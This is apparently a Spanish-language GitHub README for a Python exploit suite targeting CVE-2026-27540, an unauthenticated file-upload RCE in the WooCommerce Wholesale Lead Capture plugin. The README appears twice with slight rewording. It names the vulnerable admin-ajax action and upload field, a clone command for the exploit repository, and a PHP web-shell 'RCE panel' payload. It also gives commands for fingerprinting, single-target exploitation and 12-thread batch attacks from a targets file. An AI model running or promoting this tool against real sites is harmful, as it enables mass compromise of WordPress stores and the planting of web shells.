Suite de exploits en Python para CVE-2026-27540, una RCE por carga de archivos no autenticada en el plugin WooCommerce Wholesale Lead Capture, con fingerprinting, selección de objetivos por lotes y un payload de panel RCE.
WooCommerce Wholesale Lead Capture (WWLC) — Carga de archivos sin autenticación → RCE
| Producto | WooCommerce Wholesale Lead Capture — plugin wwlc |
| Versión | ≤ 2.0.3.1 |
| Corregido | 2.0.3.2+ — manejador de carga protegido |
| Auth | Sin autenticación |
| Vector | admin-ajax.php?action=wwlc_file_upload_handler |
| Campo | file (carga multipart) |
| Ruta de escritura | Directorio de uploads de WordPress |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handlergit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| Archivo | Función |
|---|---|
winrarzips_brand.py | Banner de CMD (by winrarzips) |
wwlc_core.py | Motor de exploit |
CVE-2026-27540-Suite.py | CLI por lotes + objetivo único |
payloads/x7-panel.php | Panel RCE |
requirements.txt | Dependencias |
❌ Lista de objetivos, resultados de escaneo y URLs del panel no están en el repo.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed
WooCommerce Wholesale Lead Capture (WWLC) — Carga de archivos sin autenticación → RCE
| Producto | WooCommerce Wholesale Lead Capture — plugin wwlc |
| Afectado | ≤ 2.0.3.1 |
| Corregido | 2.0.3.2+ — manejador de carga reforzado |
| Auth | Sin autenticación |
| Vector | admin-ajax.php?action=wwlc_file_upload_handler |
| Campo | file (carga multipart) |
| Ruta de escritura | Directorio de uploads de WordPress |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handlergit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| Archivo | Función |
|---|---|
winrarzips_brand.py | Banner de CMD (by winrarzips) |
wwlc_core.py | Núcleo del exploit |
CVE-2026-27540-Suite.py | CLI por lotes + objetivo único |
payloads/x7-panel.php | Payload del panel RCE |
requirements.txt | Dependencias |
❌ Las listas de objetivos, los resultados de escaneo y las URLs de paneles activos no están incluidos.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed